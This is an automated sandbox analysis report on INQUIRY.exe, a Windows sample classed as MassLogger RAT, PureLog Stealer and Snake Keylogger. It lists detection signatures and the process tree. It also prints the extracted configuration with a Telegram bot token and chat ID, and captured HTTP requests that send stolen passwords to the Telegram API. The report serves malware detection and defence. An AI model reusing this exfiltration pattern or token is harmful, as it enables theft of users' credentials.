
Windows Analysis Report
INQUIRY.exe

Overview

General Information

Sample name: INQUIRY.exe
Analysis ID: 1580751
MD5: ba7b76b0763b1488a2aee0892bdbbf12
SHA1: 630f66e0cde7e6830c24f51afc7f811c422a4ca7
SHA256: 7d0dd6fef8949eb3e2a88946865f6c8cdd4444ea224a99caa547f3ce68cf5299
Tags: exe, user-threatcat_ch

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INQUIRY.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: BA7B76B0763B1488A2AEE0892BDBBF12)
    • RegSvcs.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • INQUIRY.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: BA7B76B0763B1488A2AEE0892BDBBF12)
      • RegSvcs.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
MassLogger: {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
Source | Rule | Description | Author | Strings
00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(28 entries in total; only the first are shown here)

Source | Rule | Description | Author | Strings
0.2.INQUIRY.exe.1db0000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
3.2.RegSvcs.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
3.2.RegSvcs.exe.3f86458.4.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
3.2.RegSvcs.exe.3f86458.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
3.2.RegSvcs.exe.3f86458.4.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(95 entries in total; only the first are shown here)

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T02:45:27.144850+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T02:45:16.025532+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 193.122.6.168 | 80 | TCP
2024-12-26T02:45:25.025525+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T02:45:26.543698+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP


AV Detection

Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
Source: RegSvcs.exe.7348.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
Source: INQUIRY.exe | Virustotal: Detection: 45%
Source: INQUIRY.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: INQUIRY.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: INQUIRY.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A7445A
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7C6D1 FindFirstFileW,FindClose,0_2_00A7C6D1
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A7C75C
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7EF95
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7F0F2
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7F3F3
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A737EF
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A73B12
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 3_2_02BA0EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 3_2_06C67A32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 3_2_06C639A4

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49739 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View | IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 193.122.6.168:80
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00A822EE
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000308D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A84164
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A83F66
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00A7001C
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A9CABC

System Summary

Source: 0.2.INQUIRY.exe.1db0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.INQUIRY.exe.1de0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00A13B3A
Source: INQUIRY.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: INQUIRY.exe, 00000000.00000000.1684609381.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f82093b0-a
Source: INQUIRY.exe, 00000000.00000000.1684609381.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_7cd83991-d
Source: INQUIRY.exe, 00000002.00000002.1709099077.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2f1ef72a-1
Source: INQUIRY.exe, 00000002.00000002.1709099077.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_ceded60a-d
              Source: INQUIRY.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_634a5bec-0
